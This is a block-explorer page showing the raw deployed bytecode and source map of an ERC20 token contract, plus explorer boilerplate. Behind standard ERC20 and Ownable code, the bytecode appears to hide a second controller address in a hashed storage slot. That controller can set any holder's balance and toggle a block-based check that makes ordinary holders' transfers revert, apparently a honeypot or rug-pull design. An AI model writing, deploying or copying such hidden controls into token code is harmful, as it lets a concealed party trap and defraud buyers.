0x608060405234801561001057600080fd5b506004361061012c5760003560e01c806375a361c5116100ad578063a457c2d711610071578063a457c2d71461024d578063a8aa1b3114610260578063a9059cbb14610268578063dd62ed3e1461027b578063f2fde38b1461028e5761012c565b806375a361c5146102025780638187f5161461020a57806384bf2a081461021d5780638da5cb5b1461023057806395d89b41146102455761012c565b806336b2e027116100f457806336b2e027146101ac57806339509351146101bf57806370a08231146101d2578063715018a6146101e557806371da213e146101ef5761012c565b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461016f57806323b872dd14610184578063313ce56714610197575b600080fd5b6101396102a1565b6040516101469190610aa5565b60405180910390f35b61016261015d366004610a5d565b610333565b6040516101469190610a9a565b610177610355565b6040516101469190610d5e565b610162610192366004610a22565b61035b565b61019f610389565b6040516101469190610d67565b6101626101ba3660046109cf565b61038e565b6101626101cd366004610a5d565b6103a3565b6101776101e03660046109cf565b6103cf565b6101ed6103ee565b005b6101776101fd3660046109cf565b610402565b610162610414565b6101ed6102183660046109cf565b61041d565b6101ed61022b366004610a5d565b610499565b610238610541565b6040516101469190610a86565b610139610550565b61016261025b366004610a5d565b61055f565b6102386105a7565b610162610276366004610a5d565b6105b6565b6101776102893660046109f0565b6105ce565b6101ed61029c3660046109cf565b6105f9565b6060600380546102b090610d99565b80601f01602080910402602001604051908101604052809291908181526020018280546102dc90610d99565b80156103295780601f106102fe57610100808354040283529160200191610329565b820191906000526020600020905b81548152906001019060200180831161030c57829003601f168201915b5050505050905090565b60008061033e610636565b905061034b81858561063a565b5060019392505050565b60025490565b600080610366610636565b90506103738582856106ee565b61037e858585610738565b506001949350505050565b601290565b60086020526000908152604090205460ff1681565b6000806103ae610636565b905061034b8185856103c085896105ce565b6103ca9190610d75565b61063a565b6001600160a01b0381166000908152602081905260409020545b919050565b6103f6610922565b6104006000610961565b565b60066020526000908152604090205481565b60075460ff1681565b6104467f140f1f5c37a861fe6d912bc017fef84158e8b6b510b17348f61a113179a0dbad610633565b546001600160a01b031633146104775760405162461bcd60e51b815260040161046e90610bc3565b60405180910390fd5b600580546001600160a01b0319166001600160a01b0392909216919091179055565b6104c27f140f1f5c37a861fe6d912bc017fef84158e8b6b510b17348f61a113179a0dbad610633565b546001600160a01b031633146104ea5760405162461bcd60e51b815260040161046e90610bc3565b6001600160a01b0382166000908152602081905260408120829055607b8214610528578160ea146105205760075460ff16610523565b60005b61052b565b60015b6007805460ff1916911515919091179055505050565b6009546001600160a01b031690565b6060600480546102b090610d99565b60008061056a610636565b9050600061057882866105ce565b90508381101561059a5760405162461bcd60e51b815260040161046e90610d19565b61037e828686840361063a565b6005546001600160a01b031681565b6000806105c1610636565b905061034b818585610738565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610601610922565b6001600160a01b0381166106275760405162461bcd60e51b815260040161046e90610b3b565b61063081610961565b50565b90565b3390565b6001600160a01b0383166106605760405162461bcd60e51b815260040161046e90610cd5565b6001600160a01b0382166106865760405162461bcd60e51b815260040161046e90610b81565b6001600160a01b0380841660008181526001602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906106e1908590610d5e565b60405180910390a3505050565b60006106fa84846105ce565b9050600019811461073257818110156107255760405162461bcd60e51b815260040161046e90610bde565b610732848484840361063a565b50505050565b6001600160a01b03831661075e5760405162461bcd60e51b815260040161046e90610c90565b6001600160a01b0382166107845760405162461bcd60e51b815260040161046e90610af8565b436107908484846109b3565b6001600160a01b03841660009081526008602052604090205460ff161580156107d257506001600160a01b03831660009081526008602052604090205460ff16155b15610871576001600160a01b0380841660009081526006602052604090205460055490918681169116148015610806575080155b1561082b576001600160a01b038416600090815260066020526040902082905561086f565b506001600160a01b03841660009081526006602052604090205460075460ff161561086f578015806108665750610863816001610d75565b82105b61086f57600080fd5b505b6001600160a01b038416600090815260208190526040902054828110156108aa5760405162461bcd60e51b815260040161046e90610c15565b6001600160a01b0380861660008181526020819052604080822087860390559287168082529083902080548701905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610908908790610d5e565b60405180910390a361091b8585856109b3565b5050505050565b61092a610636565b6001600160a01b031661093b610541565b6001600160a01b0316146104005760405162461bcd60e51b815260040161046e90610c5b565b600980546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b505050565b80356001600160a01b03811681146103e957600080fd5b6000602082840312156109e0578081fd5b6109e9826109b8565b9392505050565b60008060408385031215610a02578081fd5b610a0b836109b8565b9150610a19602084016109b8565b90509250929050565b600080600060608486031215610a36578081fd5b610a3f846109b8565b9250610a4d602085016109b8565b9150604084013590509250925092565b60008060408385031215610a6f578182fd5b610a78836109b8565b946020939093013593505050565b6001600160a01b0391909116815260200190565b901515815260200190565b6000602080835283518082850152825b81811015610ad157858101830151858201604001528201610ab5565b81811115610ae25783604083870101525b50601f01601f1916929092016040019392505050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526026908201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160408201526564647265737360d01b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252600190820152606160f81b604082015260600190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610d9457634e487b7160e01b81526011600452602481fd5b500190565b600281046001821680610dad57607f821691505b60208210811415610dce57634e487b7160e01b600052602260045260246000fd5b5091905056fea2646970667358221220f49815862aa7d0acb25243003896b2e1d064e6c6bead70240cd22ccbe283d8b164736f6c63430008000033

Deployed Bytecode Sourcemap

24028:87:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12745:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15096:201;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;13865:108::-;;;:::i;:::-;;;;;;;:::i;15877:295::-;;;;;;:::i;:::-;;:::i;13707:93::-;;;:::i;:::-;;;;;;;:::i;18137:49::-;;;;;;:::i;:::-;;:::i;16581:238::-;;;;;;:::i;:::-;;:::i;14036:127::-;;;;;;:::i;:::-;;:::i;2785:103::-;;;:::i;:::-;;18066:43;;;;;;:::i;:::-;;:::i;18116:19::-;;;:::i;12509:166::-;;;;;;:::i;:::-;;:::i;17754:304::-;;;;;;:::i;:::-;;:::i;2137:87::-;;;:::i;:::-;;;;;;;:::i;12964:104::-;;;:::i;17322:424::-;;;;;;:::i;:::-;;:::i;11719:19::-;;;:::i;14369:193::-;;;;;;:::i;:::-;;:::i;14625:151::-;;;;;;:::i;:::-;;:::i;3043:201::-;;;;;;:::i;:::-;;:::i;12745:100::-;12799:13;12832:5;12825:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12745:100;:::o;15096:201::-;15179:4;15196:13;15212:12;:10;:12::i;:::-;15196:28;;15235:32;15244:5;15251:7;15260:6;15235:8;:32::i;:::-;-1:-1:-1;15285:4:0;;15096:201;-1:-1:-1;;;15096:201:0:o;13865:108::-;13953:12;;13865:108;:::o;15877:295::-;16008:4;16025:15;16043:12;:10;:12::i;:::-;16025:30;;16066:38;16082:4;16088:7;16097:6;16066:15;:38::i;:::-;16115:27;16125:4;16131:2;16135:6;16115:9;:27::i;:::-;-1:-1:-1;16160:4:0;;15877:295;-1:-1:-1;;;;15877:295:0:o;13707:93::-;13790:2;13707:93;:::o;18137:49::-;;;;;;;;;;;;;;;:::o;16581:238::-;16669:4;16686:13;16702:12;:10;:12::i;:::-;16686:28;;16725:64;16734:5;16741:7;16778:10;16750:25;16760:5;16767:7;16750:9;:25::i;:::-;:38;;;;:::i;:::-;16725:8;:64::i;14036:127::-;-1:-1:-1;;;;;14137:18:0;;14110:7;14137:18;;;;;;;;;;;14036:127;;;;:::o;2785:103::-;2023:13;:11;:13::i;:::-;2850:30:::1;2877:1;2850:18;:30::i;:::-;2785:103::o:0;18066:43::-;;;;;;;;;;;;;:::o;18116:19::-;;;;;;:::o;12509:166::-;12597:35;11646:66;12597:26;:35::i;:::-;:41;-1:-1:-1;;;;;12597:41:0;12583:10;:55;12575:69;;;;-1:-1:-1;;;12575:69:0;;;;;;;:::i;:::-;;;;;;;;;12655:4;:12;;-1:-1:-1;;;;;;12655:12:0;-1:-1:-1;;;;;12655:12:0;;;;;;;;;;12509:166::o;17754:304::-;17838:35;11646:66;17838:26;:35::i;:::-;:41;-1:-1:-1;;;;;17838:41:0;17824:10;:55;17816:69;;;;-1:-1:-1;;;17816:69:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;17955:11:0;;17896:36;17955:11;;;;;;;;;;:20;;;18006:3;17996:13;;:54;;18019:6;18029:3;18019:13;:31;;18043:7;;;;18019:31;;;18035:5;18019:31;17996:54;;;18012:4;17996:54;17986:7;:64;;-1:-1:-1;;17986:64:0;;;;;;;;;;-1:-1:-1;;;17754:304:0:o;2137:87::-;2210:6;;-1:-1:-1;;;;;2210:6:0;2137:87;:::o;12964:104::-;13020:13;13053:7;13046:14;;;;;:::i;17322:424::-;17415:4;17432:13;17448:12;:10;:12::i;:::-;17432:28;;17471:24;17498:25;17508:5;17515:7;17498:9;:25::i;:::-;17471:52;;17562:15;17542:16;:35;;17534:85;;;;-1:-1:-1;;;17534:85:0;;;;;;;:::i;:::-;17647:60;17656:5;17663:7;17691:15;17672:16;:34;17647:8;:60::i;11719:19::-;;;-1:-1:-1;;;;;11719:19:0;;:::o;14369:193::-;14448:4;14465:13;14481:12;:10;:12::i;:::-;14465:28;;14504;14514:5;14521:2;14525:6;14504:9;:28::i;14625:151::-;-1:-1:-1;;;;;14741:18:0;;;14714:7;14741:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;14625:151::o;3043:201::-;2023:13;:11;:13::i;:::-;-1:-1:-1;;;;;3132:22:0;::::1;3124:73;;;;-1:-1:-1::0;;;3124:73:0::1;;;;;;;:::i;:::-;3208:28;3227:8;3208:18;:28::i;:::-;3043:201:::0;:::o;5234:195::-;5407:4;5382:40::o;682:98::-;762:10;682:98;:::o;21357:380::-;-1:-1:-1;;;;;21493:19:0;;21485:68;;;;-1:-1:-1;;;21485:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;21572:21:0;;21564:68;;;;-1:-1:-1;;;21564:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;21645:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;;:36;;;21697:32;;;;;21675:6;;21697:32;:::i;:::-;;;;;;;;21357:380;;;:::o;22028:441::-;22163:24;22190:25;22200:5;22207:7;22190:9;:25::i;:::-;22163:52;;-1:-1:-1;;22230:16:0;:37;22226:236;;22312:6;22292:16;:26;;22284:68;;;;-1:-1:-1;;;22284:68:0;;;;;;;:::i;:::-;22388:51;22397:5;22404:7;22432:6;22413:16;:25;22388:8;:51::i;:::-;22028:441;;;;:::o;18657:1274::-;-1:-1:-1;;;;;18788:18:0;;18780:68;;;;-1:-1:-1;;;18780:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;18867:16:0;;18859:64;;;;-1:-1:-1;;;18859:64:0;;;;;;;:::i;:::-;18948:12;18973:38;18994:4;19000:2;19004:6;18973:20;:38::i;:::-;-1:-1:-1;;;;;19029:23:0;;;;;;:17;:23;;;;;;;;19028:24;:50;;;;-1:-1:-1;;;;;;19057:21:0;;;;;;:17;:21;;;;;;;;19056:22;19028:50;19024:373;;;-1:-1:-1;;;;;19109:11:0;;;19094:12;19109:11;;;:7;:11;;;;;;19147:4;;19109:11;;19139:12;;;19147:4;;19139:12;:25;;;;-1:-1:-1;19155:9:0;;19139:25;19135:251;;;-1:-1:-1;;;;;19184:11:0;;;;;;:7;:11;;;;;:17;;;19135:251;;;-1:-1:-1;;;;;;19247:13:0;;;;;;:7;:13;;;;;;19283:7;;;;19279:92;;;19323:9;;;:27;;-1:-1:-1;19342:8:0;:4;19349:1;19342:8;:::i;:::-;19336:3;:14;19323:27;19314:37;;;;;;19024:373;;-1:-1:-1;;;;;19433:15:0;;19411:19;19433:15;;;;;;;;;;;19467:21;;;;19459:72;;;;-1:-1:-1;;;19459:72:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;19577:15:0;;;:9;:15;;;;;;;;;;;19595:20;;;19577:38;;19795:13;;;;;;;;;;:23;;;;;;19847:26;;;;;;19609:6;;19847:26;:::i;:::-;;;;;;;;19886:37;19906:4;19912:2;19916:6;19886:19;:37::i;:::-;18657:1274;;;;;:::o;2302:132::-;2377:12;:10;:12::i;:::-;-1:-1:-1;;;;;2366:23:0;:7;:5;:7::i;:::-;-1:-1:-1;;;;;2366:23:0;;2358:68;;;;-1:-1:-1;;;2358:68:0;;;;;;;:::i;3404:191::-;3497:6;;;-1:-1:-1;;;;;3514:17:0;;;-1:-1:-1;;;;;;3514:17:0;;;;;;;3547:40;;3497:6;;;3514:17;3497:6;;3547:40;;3478:16;;3547:40;3404:191;;:::o;23069:125::-;;;;:::o;14:175:1:-;84:20;;-1:-1:-1;;;;;133:31:1;;123:42;;113:2;;179:1;176;169:12;194:198;;306:2;294:9;285:7;281:23;277:32;274:2;;;327:6;319;312:22;274:2;355:31;376:9;355:31;:::i;:::-;345:41;264:128;-1:-1:-1;;;264:128:1:o;397:274::-;;;526:2;514:9;505:7;501:23;497:32;494:2;;;547:6;539;532:22;494:2;575:31;596:9;575:31;:::i;:::-;565:41;;625:40;661:2;650:9;646:18;625:40;:::i;:::-;615:50;;484:187;;;;;:::o;676:342::-;;;;822:2;810:9;801:7;797:23;793:32;790:2;;;843:6;835;828:22;790:2;871:31;892:9;871:31;:::i;:::-;861:41;;921:40;957:2;946:9;942:18;921:40;:::i;:::-;911:50;;1008:2;997:9;993:18;980:32;970:42;;780:238;;;;;:::o;1023:266::-;;;1152:2;1140:9;1131:7;1127:23;1123:32;1120:2;;;1173:6;1165;1158:22;1120:2;1201:31;1222:9;1201:31;:::i;:::-;1191:41;1279:2;1264:18;;;;1251:32;;-1:-1:-1;;;1110:179:1:o;1294:203::-;-1:-1:-1;;;;;1458:32:1;;;;1440:51;;1428:2;1413:18;;1395:102::o;1502:187::-;1667:14;;1660:22;1642:41;;1630:2;1615:18;;1597:92::o;1694:603::-;;1835:2;1864;1853:9;1846:21;1896:6;1890:13;1939:6;1934:2;1923:9;1919:18;1912:34;1964:4;1977:140;1991:6;1988:1;1985:13;1977:140;;;2086:14;;;2082:23;;2076:30;2052:17;;;2071:2;2048:26;2041:66;2006:10;;1977:140;;;2135:6;2132:1;2129:13;2126:2;;;2205:4;2200:2;2191:6;2180:9;2176:22;2172:31;2165:45;2126:2;-1:-1:-1;2281:2:1;2260:15;-1:-1:-1;;2256:29:1;2241:45;;;;2288:2;2237:54;;1815:482;-1:-1:-1;;;1815:482:1:o;2302:399::-;2504:2;2486:21;;;2543:2;2523:18;;;2516:30;2582:34;2577:2;2562:18;;2555:62;-1:-1:-1;;;2648:2:1;2633:18;;2626:33;2691:3;2676:19;;2476:225::o;2706:402::-;2908:2;2890:21;;;2947:2;2927:18;;;2920:30;2986:34;2981:2;2966:18;;2959:62;-1:-1:-1;;;3052:2:1;3037:18;;3030:36;3098:3;3083:19;;2880:228::o;3113:398::-;3315:2;3297:21;;;3354:2;3334:18;;;3327:30;3393:34;3388:2;3373:18;;3366:62;-1:-1:-1;;;3459:2:1;3444:18;;3437:32;3501:3;3486:19;;3287:224::o;3516:324::-;3718:2;3700:21;;;3757:1;3737:18;;;3730:29;-1:-1:-1;;;3790:2:1;3775:18;;3768:31;3831:2;3816:18;;3690:150::o;3845:353::-;4047:2;4029:21;;;4086:2;4066:18;;;4059:30;4125:31;4120:2;4105:18;;4098:59;4189:2;4174:18;;4019:179::o;4203:402::-;4405:2;4387:21;;;4444:2;4424:18;;;4417:30;4483:34;4478:2;4463:18;;4456:62;-1:-1:-1;;;4549:2:1;4534:18;;4527:36;4595:3;4580:19;;4377:228::o;4610:356::-;4812:2;4794:21;;;4831:18;;;4824:30;4890:34;4885:2;4870:18;;4863:62;4957:2;4942:18;;4784:182::o;4971:401::-;5173:2;5155:21;;;5212:2;5192:18;;;5185:30;5251:34;5246:2;5231:18;;5224:62;-1:-1:-1;;;5317:2:1;5302:18;;5295:35;5362:3;5347:19;;5145:227::o;5377:400::-;5579:2;5561:21;;;5618:2;5598:18;;;5591:30;5657:34;5652:2;5637:18;;5630:62;-1:-1:-1;;;5723:2:1;5708:18;;5701:34;5767:3;5752:19;;5551:226::o;5782:401::-;5984:2;5966:21;;;6023:2;6003:18;;;5996:30;6062:34;6057:2;6042:18;;6035:62;-1:-1:-1;;;6128:2:1;6113:18;;6106:35;6173:3;6158:19;;5956:227::o;6188:177::-;6334:25;;;6322:2;6307:18;;6289:76::o;6370:184::-;6542:4;6530:17;;;;6512:36;;6500:2;6485:18;;6467:87::o;6559:229::-;;6630:1;6626:6;6623:1;6620:13;6617:2;;;-1:-1:-1;;;6656:33:1;;6712:4;6709:1;6702:15;6742:4;6663:3;6730:17;6617:2;-1:-1:-1;6773:9:1;;6607:181::o;6793:380::-;6878:1;6868:12;;6925:1;6915:12;;;6936:2;;6990:4;6982:6;6978:17;6968:27;;6936:2;7043;7035:6;7032:14;7012:18;7009:38;7006:2;;;7089:10;7084:3;7080:20;7077:1;7070:31;7124:4;7121:1;7114:15;7152:4;7149:1;7142:15;7006:2;;6848:325;;;:::o

Swarm Source

ipfs://f49815862aa7d0acb25243003896b2e1d064e6c6bead70240cd22ccbe283d8b1
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.